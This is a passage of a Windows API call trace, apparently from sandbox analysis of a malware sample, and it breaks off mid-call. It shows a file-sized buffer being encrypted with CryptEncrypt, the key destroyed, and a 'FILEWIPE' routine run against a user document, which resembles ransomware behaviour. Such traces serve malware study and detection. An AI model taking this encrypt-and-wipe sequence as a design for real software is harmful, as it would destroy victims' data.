CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.875] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.875] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.876] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.876] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.876] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.876] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.877] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x2691, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x26a0) returned 1 [0177.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.877] CharLowerBuffW (in: lpsz="byte[9889]", cchLength=0xa | out: lpsz="byte[9889]") returned 0xa [0177.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.877] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.877] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.877] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.877] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbec6b8*, pdwDataLen=0x87e820*=0x2691, dwBufLen=0x26a0 | out: pbData=0xbec6b8*, pdwDataLen=0x87e820*=0x26a0) returned 1 [0177.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.878] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.878] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.878] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.878] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.878] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.878] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.878] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.878] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0177.878] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.878] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.878] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.878] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.878] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.881] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.881] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.881] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0177.881] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.881] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.881] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0177.881] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.881] CryptDestroyKey (hKey=0x90af18) returned 1 [0177.881] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.881] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.882] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.882] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.882] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0177.882] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0177.882] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.882] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0177.882] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.882] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.882] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.882] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.882] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.882] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.882] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.882] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.882] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.882] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.882] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0177.882] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.882] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.882] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0177.882] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.883] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0177.883] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.883] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0177.883] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.883] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.883] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0177.911] FreeLibrary (hLibModule=0x74f20000) returned 1 [0177.911] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.911] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.911] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.912] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.913] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.914] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.914] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0177.914] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.915] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.915] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.ots", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f0f0f0, ftCreationTime.dwHighDateTime=0x1d5e547, ftLastAccessTime.dwLowDateTime=0x24d4fc30, ftLastAccessTime.dwHighDateTime=0x1d5dd39, ftLastWriteTime.dwLowDateTime=0x24d4fc30, ftLastWriteTime.dwHighDateTime=0x1d5dd39, nFileSizeHigh=0x0, nFileSizeLow=0x2691, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="G856.ots", cAlternateFileName="")) returned 0x90af58 [0177.915] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0177.915] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.915] CharLowerBuffW (in: lpsz="byte[9873]", cchLength=0xa | out: lpsz="byte[9873]") returned 0xa [0177.915] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.915] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0177.915] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.915] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0177.915] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c27f8 [0177.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c27f8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0177.916] FreeLibrary (hLibModule=0x75c90000) returned 1 [0177.916] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.916] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0177.916] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0177.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0177.916] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0177.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0177.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0177.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0177.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0177.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0177.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0177.918] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0177.918] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.918] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.918] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.918] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.918] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0177.918] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0177.918] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.918] RtlAllocateHeap (HeapHandle=0x8a0000, 